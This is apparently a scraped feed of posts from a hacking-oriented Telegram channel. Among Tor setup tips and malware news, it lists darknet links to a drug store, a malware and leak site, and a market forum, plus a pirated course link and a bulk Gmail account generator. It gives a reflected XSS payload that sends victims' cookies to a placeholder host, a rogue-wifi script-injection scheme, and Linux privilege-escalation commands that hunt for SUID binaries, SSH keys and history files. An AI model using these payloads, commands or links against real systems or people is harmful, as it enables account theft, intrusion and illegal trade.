▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑VPS & LEAK .ONION 7/24 & 24/24 ALIVE
https://www.torproject.org/

http://torvps7kzis5ujfz.onion/ – TorVPS

http://novarcbekzy3xwcq.onion/ – Home :: NOVA LABS

http://s5q54hfww56ov2xc.onion/ – BitPharma – biggest european .onion drug store – Cocaine for Bitcoins, Psychedelics for Bitcoins, Prescriptions for Bitcoins, Viagra for Bitcoins

http://kp6yw42wb5wpsd6n.onion/ – Login · Minerva

http://onionlandbakyt3j.onion/ – Onionland · Enjoy the rides, but you might die.

http://4apu65ago3nbpbaf.onion/ – SHARE ! This deep web links list is provided by http://hiddenwikitor.org/ and http://wiki5kauuihowqi5.onion/

http://5xgrs443ogbyfoh2.onion/ – Tor Project: Anonymity Online

http://kpj3orlxmfs6yqah.onion/ – Products – MUSHBUD

http://sejnfjrq6szgca7v.onion/ – Debian — The Universal Operating System

http://familybw6azkhjsc.onion/ – My Family Videos

http://7rmath4ro2of2a42.onion/ – SoylentNews: SoylentNews is people

http://zcashph5mxqjjby2.onion/ – Zcash – All coins are created equal.

http://exoduockgfq3ikf7.onion/ – Ex0du$ – Malware,Leaks,Exploits,Dumps and more!

http://dr5aamfveql2b34p.onion/ – VuzeWiki

http://hbooruahi4zr2h73.onion/ – HBS

http://4fvfamdpoulu2nms.onion/ – Lucky Eddie’s Home

http://tmskhzafkndqaqyx.onion/ – DreamMarket Forum

@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑HOW INSTALL TOR IN KALI 2 STEPS :

How To Install Tor Browser In Kali Linux Using Apt
Open a terminal window

1) Run apt-get update

2) Run apt-get install tor torbrowser-launcher and select Y at the prompt

3) Now you’ll have a new Tor Browser application in the Applications menu under Usual Applications and Internet.

> This shortcut will only work if you’re not running as the root user.
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Be wary of the BasedMiner mining Trojan blasting weak SQL passwords to invade mining :
#News

> The mining Trojan gang mainly targeted MS SQL services to blast weak password attacks. After successful blasting, it will download the Gh0st remote control Trojan to control the system. It will also use multiple Windows vulnerabilities to perform privilege escalation attacks to obtain the highest system privileges and implant Monroe. The coin mining Trojan has been mining and has made a profit of 8,000 yuan.

> Because its remote control module is named based.dll, Tencent Security Center named it BasedMiner. After the BasedMiner invasion, the remote control Trojan is implanted in the enterprise server, which may lead to the leakage of confidential information of the victimized enterprise.

> When mining, the server resources will be seriously consumed, which will affect the normal business operation. Tencent security experts recommend that companies check and correct the use of weak passwords to log in to the server, repair security vulnerabilities in the server, and avoid intrusion by mining gangs.

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Build your own Instagram-facebook App with Swift -3.82 GB-

https://www.skillshare.com/classes/Build-an-Instagram-Clone-App-with-Swift/1410999441

https://mega.nz/#F!RbgQ2YJZ!1XxFQxPvGQcioAWQYoZihA

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How to Synchronizing local and remote directories in Linux using Lsyncd ?

Installing Lsyncd


1️⃣On Debian and its derivatives, such as Ubuntu , Linux Mint, run the following command to install Lsyncd:

> sudo apt-get install lsyncd


2️⃣On RHEL, CentOS , you need to enable the Epel repository first.

a) sudo yum install epel-release


b) Then install Lsyncd with the command:

> sudo yum install lsyncd

> Lsyncd configuration on Debian and Ubuntu and derivatives

> Lsyncd does not provide a default configuration file on DEB based systems.

c) We need to create it manually. However, Lsyncd includes some sample configuration files that are useful to get a general idea of ​​how to do synchronization. The configuration example files will be found under the directory “/ usr / share / doc / lsyncd - * / examples” .

> ls / usr / share / doc / lsyncd / examples /

d) Output example:

lbash.lua lgforce.lua lpostcmd.lua lrsyncssh.lua
lecho.lua limagemagic.lua lrsync.lua

e) As you can see in the above output, each config file is with a .lua extension. This is because the lsync configuration file is written using the Lua programming language. Let's take a look at a sample configuration file.

> cat /usr/share/doc/lsyncd/examples/lrsync.lua


f) The Lrsync configuration file looks like this:

----
- User configuration file for lsyncd.
-
- Simple example for default rsync.
-
settings = {
statusFile = "/tmp/lsyncd.stat",
statusInterval = 1,
}

sync {
default.rsync,
source = "src",
target = "trg",
}

enjoy ❤️👍🏿
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑GENERATE UNLIMITED GMAILS :

1️⃣DOWNLOAD :

> https://pypi.org/search/?c=Environment+%3A%3A+Win32+%28MS+Windows%29
(WIN)

> https://pypi.org/project/PyAutoGUI/ (for linux)

1) $ sudo apt-get install python-virtualenv

2) $ virtualenv --no-site-packages ~/venv

3) $ source ~/venv/bin/activate

4) $ mkdir -p ~/PIL ~/temp/site-packages

5) $ export PYTHONPATH=~/temp/site-packages/

6) $ cd ~/PIL

7) $ wget http://effbot.org/downloads/Imaging-1.1.7.tar.gz

8) $ sudo apt-get build-dep python-imaging
# sets up zlib1g-dev, libfreetype6-dev, libjpeg62-dev, liblcms1-dev, ...

9) $ easy_install -v --install-dir ~/temp/site-packages --find-links ~/PIL\
--allow-hosts=None --always-unzip Imaging

2️⃣get firefox browser https://www.mozilla.org
/sp/firefox/new/

3️⃣git clone https://github.com/unix121/gmail-generator.git

4️⃣cd gmail-generator


5️⃣python3 gmail_generator.py

(use tor server)
6️⃣checkout the video tutorial after this post

enjoy ❤️👍🏿
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

generate unlimited gmails

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑HOW TO CHECK IF YOUR WEBSITE IS HACKED FOR BEGINERS :

1. The hacked website has a feature in the data, that is, the amount of index and the traffic from search engines have increased dramatically in a short period of time . Therefore, webmasters can benefit from the indexing tool of Baidu webmaster platform and observe whether there is any abnormality in the site's collection; if there is a sudden increase, then use the traffic and keyword tool to check whether the keywords obtained by the traffic are related to the website, whether they involve gambling and pornography. .

2. Inquiring the site through Site grammar, combined with some common pornographic and gaming keywords, the effect is better, and it is possible to find illegal pages that do not belong to the site.

3. Due to the huge traffic of Baidu, some hacked behaviors only redirect the traffic brought by Baidu, which is difficult for the webmaster to find. Therefore, when checking whether your site is hacked, you must click on the site page from the Baidu search results to view Did you jump to other sites?

4. The content of the site is prompted in the search results to be risky.

*Subsequently, you can ask website technicians to further confirm whether the website is hacked through background data and programs


WRITTEN BY UNDERCODE
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑After confirming that the website is hacked, in addition to prompting technical staff to make quick corrections, SEO staff also need to do some after-care and preventive work.

1. Stop the website service immediately to prevent users from continuing to be affected and prevent other sites from being affected (a 503 return code is recommended).

2. If multiple sites of the same hosting provider are hacked during the same period, you can contact the hosting provider to urge the other party to respond.

3. Clean up the discovered hacked content, set the hacked page as a 404 dead link, and submit it through the dead link submission tool of the Baidu webmaster platform.

4. Sort out the possible hacked time, compare it with the file modification time on the server, and process the files uploaded and modified by hackers; check the user management settings in the server to confirm whether there are abnormal changes; change the user of the server Access password. Note: You can determine the possible hacking time from the access log. But hackers may also modify the server's access log.

5. Do a good job in security, check the loopholes in the website, and prevent it from being hacked again.


WRITTEN BY UNDERCODE
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑A ransomware program called RAA has recently appeared, written entirely in JavaScript, which can lock users' files by using a strong encryption program.

H O W I T W O R K ' S ?

> Most malware in Windows is written in a compiled language such as C or C++, and is distributed in the form of executable files such as .exe or .dll. Other malware is written using command-line scripts, such as Windows batch and PowerShell.

> The malware on the client side is rarely written in web-related languages, such as JavaScript, which is mainly interpreted by the browser. But the built-in Script Host of Windows can also directly execute .js files.

> Attackers have only recently started using this technology. Last month, Microsoft warned that js attachments in malicious emails may carry viruses, and ESET’s Security Research Institute also warned that certain js attachments may walk the Locky virus. But in both cases, JavaScript files are used as a downloader of malware. They download from other addresses and install traditional malware written in other languages ​​by default. But RAA is different, this is malware written entirely in JavaScript.

> Experts at the BleepingComputer.com technical support forum said that RAA relies on CryptoJS, a secure JavaScript library, to implement its encryption process. The implementation of encryption is very solid, using the AES-256 encryption algorithm.

> Once the file is encrypted, RAA will add .locked to the suffix of the original file name. Its encryption targets include: .doc, .xls, .rtf, .pdf, .dbf, .jpg, .dwg, .cdr, .psd, .cd, .mdb, .png, .lcd, .zip, .rar And .csv.

> Lawrence Abrams, the founder of BleepingComputer.com, said in a blog post: "Under the current circumstances, there is no way to decrypt except payment.

> According to the user's response, after being infected with RAA, messages in Russian will be randomly displayed, but even if it targets Russian computers, its proliferation is only a matter of time.

> It's not normal to include JavaScript attachments in emails, so users are advised to avoid opening such files, even if they are included in .zip compressed files. .js files are rarely used anywhere except in websites and browsers.

WRITTEN BY UNDERCODE
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Reflected XSS-ALL YOU NEED TO KNOW :

The reflection-based XSS attack mainly relies on the script returned by the server of the site, which triggers execution on the client to launch a web attack.

example:

1) Make a hypothesis, when Amazon is searching for books, the submitted name is displayed when no books are found.

2) Search for content in the search box, fill in "<script>alert('handsome boy')</script>", and click search.

3) The current page does not filter the returned data and displays it directly on the page, and then the alert string will come out.

4) Then you can construct the address to obtain the user's cookies, and let others click on this address through QQ group or spam:

> http://www.amazon.cn/search?name=<script>document.location='http://xxx/get?cookie='+document.cookie</script>
S: Of course, this address is invalid, it's just an example.

🦑in conclusion:

If you only succeed in steps 1, 2, and 3, you are just tossing yourself. If you succeed in step 4, it is a decent XSS attack.

Develop safety measures:

1) When the front end displays the server data, not only the label content needs to be filtered and escaped, but even the attribute value may also be needed.

2) When the backend receives the request, it verifies whether the request is an attack request, and the attack is blocked.

E.g:

label:

<span><script>alert('handsome boy')</script></span>
Escape

<span>&lt;script&gt;alert(&#39;handsome boy&#39;)&lt;/script&gt</span>

> Attributes:

3) If the value attribute of an input is

> onclick="javascript:alert('handsome boy')
May appear


<input type="text" value="..." onclick="javascript:alert('handsome boy')">

4) Clicking on input causes the attack script to be executed. The solution can be to filter the script or double quotes.

WRITTEN BY UNDERCODE
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑DOM-based or local XSS-tutorial

Based on DOM or local XSS attacks. Generally, a free wifi is provided, but a gateway that provides free wifi will insert a script into any page you visit or directly return a phishing page, thereby implanting malicious scripts. This kind of direct existence on the page without returning through the server is a local XSS attack.

Example 1:

1. Provide a free wifi.

1. Start a special DNS service, resolve all domain names to our computer, and set the Wifi DHCP-DNS to our computer IP.

2. After the user connected to wifi opens any website, the request will be intercepted by us. We forward to the real server according to the host field in the http header.

3. After receiving the data returned by the server, we can inject the web script and return it to the user.

4. When the injected script is executed, the user's browser will preload the common script libraries of major websites in turn.

WRITTEN BY UNDERCODE
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑User & Privilege Information linux :

Command Result

whoami Current username

id Current user information

cat /etc/sudoers Who’s allowed to do what as root – Privileged command

sudo -l Can the current user perform anything as root

sudo -l 2>/dev/null | grep -w 'nmap|

perl|'awk'|'find'|'bash'|'sh'|'man'

|'more'|'less'|'vi'|'vim'|'nc'|'netcat'|python

|ruby|lua|irb' | xargs -r ls -la 2>/dev/null
Can the current user run any ‘interesting’ binaries as root and if so also display the binary permissions etc.

Enjoy ❤️👍🏻
✅git topic
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Interesting linux Files:

Command Result

find / -perm -4000 -type f 2>/dev/null Find SUID files

find / -uid 0 -perm -4000 -type f 2>/dev/null Find SUID

files owned by root

find / -perm -2000 -type f 2>/dev/null Find GUID files

find / -perm -2 -type f 2>/dev/null Find world-writeable files

find / ! -path "/proc/" -perm -2 -type f -print 2>/dev/null
Find world-writeable files excluding those in /proc

find / -perm -2 -type d 2>/dev/null Find word-writeable directories

find /home –name .rhosts -print 2>/dev/null Find rhost config files

find /home -iname .plan -exec ls -la {} ; -exec cat {} 2>/dev/null ;

Find .plan files, list permissions and cat the file contents

find /etc -iname hosts.equiv -exec ls -la {} 2>/dev/null ; -exec cat {} 2>/dev/null ; Find hosts.equiv, list permissions and cat the file contents

ls -ahlR /root/ See if you can access other user directories to find interesting files

cat ~/.bash_history Show the current users’ command history

ls -la ~/.history Show the current users’ various history files

ls -la /root/.*history Can we read root’s history files

ls -la ~/.ssh/ Check for interesting ssh files in the current users’ directory

find / -name "iddsa*" -o -name "idrsa" -o -name "known_hosts"

-o -name "authorized_hosts" -o -name "authorized_keys" 2>/dev/null |xargs -r ls -la Find SSH keys/host information

ls -la /usr/sbin/in. Check Configuration of inetd services

grep -l -i pass /var/log/.log 2>/dev/null Check log files for keywords (‘pass’ in this example) and show positive matches

find /var/log -type f -exec ls -la {} ; 2>/dev/null List files in specified directory (/var/log)

find /var/log -name .log -type f -exec ls -la {} ; 2>/dev/null

List .log files in specified directory (/var/log)


Enjoy ❤️👍🏻
✅github topic
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

malicious.link post snagging-creds-from-locked-machine #requested

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Linux commands for Service Information:

  Result

ps aux | grep root  View services running as root

ps aux | awk '{print $11}'|xargs -r ls -la 2>/dev/null |awk '!x[$0]++'  Lookup process binary path and permissions

cat /etc/inetd.conf  List services managed by inetd

cat /etc/xinetd.conf  As above for xinetd

cat /etc/xinetd.conf 2>/dev/null | awk '{print $7}' |xargs -r ls -la 
2>/dev/null  A very ‘rough’ command to extract associated 
binaries from xinetd.conf and show permissions of each

ls -la /etc/exports 2>/dev/null; cat /etc/exports 2>/dev/null  Permissions and contents of /etc/exports (NFS)

🦑Jobs/Tasks:

Command  Result

crontab -l -u %username%  Display scheduled jobs for the specified user – Privileged command

ls -la /etc/cron*  Scheduled jobs overview (hourly, daily, monthly etc)

ls -aRl /etc/cron* | awk '$1 ~ /w.$/' 2>/dev/null  What can ‘others’ write in /etc/cron* directories
 

Enjoy ❤️👍🏻

✅github topic
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How manage ftp on kali Linux ?

1️⃣apt-get update && apt-get install pure-ftpd

2️⃣go to #!/bin/bash

3️⃣groupadd ftpgroup

4️⃣useradd -g ftpgroup -d /dev/null -s /etc ftpuser

5️⃣pure-pw useradd offsec -u ftpuser -d /ftphome

6️⃣pure-pw mkdb

7️⃣cd /etc/pure-ftpd/auth/

8️⃣ln -s ../conf/PureDB 60pdb

9️⃣mkdir -p /ftphome

🔟chown -R ftpuser:ftpgroup /ftphome/

1️⃣1️⃣/etc/init.d/pure-ftpd restart

Enjoy ❤️👍🏻
✅github topic
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁